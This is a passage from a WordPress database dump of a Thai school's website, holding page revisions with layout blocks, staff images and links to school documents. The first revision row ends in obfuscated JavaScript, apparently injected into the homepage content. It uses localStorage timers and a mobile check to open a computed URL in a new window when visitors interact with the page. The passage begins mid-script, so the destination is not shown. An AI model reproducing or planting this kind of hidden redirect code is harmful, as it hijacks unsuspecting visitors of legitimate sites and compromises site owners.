_0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-16 09:25:58','2024-09-16 02:25:58','',19,'http://watprato.ssk.in.th/?p=393',0,'revision','',0),
(397,2,'2024-09-24 10:24:00','2024-09-24 03:24:00','','นางรำไพ อดทน (12.5x16 cm)','','inherit','open','closed','','%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%a3%e0%b8%b3%e0%b9%84%e0%b8%9e-%e0%b8%ad%e0%b8%94%e0%b8%97%e0%b8%99-12-5x16-cm','','','2024-09-24 10:24:00','2024-09-24 03:24:00','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/นางรำไพ-อดทน-12.5x16-cm.png',0,'attachment','image/png',0),
(398,2,'2024-09-24 10:24:11','2024-09-24 03:24:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":5,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":397,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/นางรำไพ-อดทน-12.5x16-cm-800x1024.png\" alt=\"\" class=\"wp-image-397\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"9a3f4403\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"c36e8900\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a 